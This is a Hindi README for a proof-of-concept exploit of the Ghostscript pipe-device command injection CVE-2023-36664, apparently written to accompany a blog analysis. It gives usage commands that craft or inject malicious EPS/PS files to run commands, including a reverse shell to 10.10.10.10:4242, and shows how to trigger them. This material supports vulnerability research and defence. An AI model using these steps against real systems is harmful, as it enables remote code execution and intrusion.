
Ghostscript कमांड इंजेक्शन भेद्यता PoC (CVE-2023-36664)
Ghostscript के संस्करण 10.01.2 से पहले में खोजी गई भेद्यता कोड निष्पादन की ओर ले जाती है (CVSS स्कोर 9.8)।
आधिकारिक भेद्यता विवरण:
Artifex Ghostscript 10.01.2 तक पाइप डिवाइसों के लिए अनुमति सत्यापन को गलत तरीके से संभालता है (%pipe% उपसर्ग या | पाइप वर्ण उपसर्ग के साथ)।
Debian ने एक सुरक्षा सलाह जारी की जिसमें मनमाने कमांडों के संभावित निष्पादन का उल्लेख किया गया:
"यह पाया गया कि Ghostscript, GPL PostScript/PDF इंटरप्रेटर, पाइप डिवाइसों के लिए अनुमति सत्यापन को ठीक से संभाल नहीं पाता, जिसके परिणामस्वरूप यदि दोषपूर्ण दस्तावेज़ फ़ाइलें संसाधित की जाती हैं तो मनमाने कमांडों का निष्पादन हो सकता है।"
यह रेपो vsociety ब्लॉग पर उपलब्ध CVE विश्लेषण ब्लॉग पोस्ट के लिए बनाया गया है।
Ghostscript 10.01.1 यहाँ डाउनलोड करें: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs10011 Windows x64 निष्पादन योग्य का सीधा लिंक: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10011/gs10011w64.exe
PS या EPS फ़ाइल खोलने पर शोषण हो सकता है और यह कोड निष्पादन की अनुमति दे सकता है, जो पाइप डिवाइसों के लिए अनुमति सत्यापन को गलत तरीके से संभालने के कारण होता है।
उपयोग: python3 CVE_2023_36664_exploit.py <input_file> <command>
उदाहरण:
python3 CVE_2023_36664_exploit.py file.eps "calc"
यह file_injected.eps नामक एक नई फ़ाइल उत्पन्न करता है।
कैलकुलेटर को ट्रिगर करने के लिए इसे Ghostscript के साथ खोलें (संस्करण 9.50 से आपको -dNOSAFER विकल्प का भी उपयोग करना होगा):
gs10011w64.exe -dNOSAFER .\file_injected.eps

अन्य उदाहरण: Windows पर एक नया कैलकुलेटर खोलने वाले पेलोड "calc" के साथ run_calculator.eps नामक एक नई EPS फ़ाइल उत्पन्न करें
python3 CVE_2023_36664_exploit.py --generate --payload calc --filename run_calculator --extension eps
कस्टम IP के साथ rev_shell.eps नामक एक नई EPS फ़ाइल उत्पन्न करें (Unix पर ट्रिगर होने पर रिवर्स शेल प्रारंभ करें)
python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.10.10 -port 4242 --filename trigger_revshell --extension eps
पेलोड "calc" के साथ malicius.ps नामक एक नई PS फ़ाइल उत्पन्न करें (Windows पर एक नया कैलकुलेटर खोलता है)
python3 CVE_2023_36664_exploit.py -g -p "calc" -x ps
file.eps नामक मौजूदा फ़ाइल में दुर्भावनापूर्ण कस्टम पेलोड ("calc") इंजेक्ट करें (Windows पर एक नया कैलकुलेटर खोलता है)
python3 CVE_2023_36664_exploit.py --inject --payload "calc" --filename file.eps
यह सॉफ़्टवेयर पूरी तरह से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्य से बनाया गया है, और इसका उद्देश्य स्पष्ट रूप से अधिकृत स्थानों को छोड़कर सिस्टम पर हमला करने के लिए उपयोग करना नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। ज़िम्मेदारी से उपयोग करें।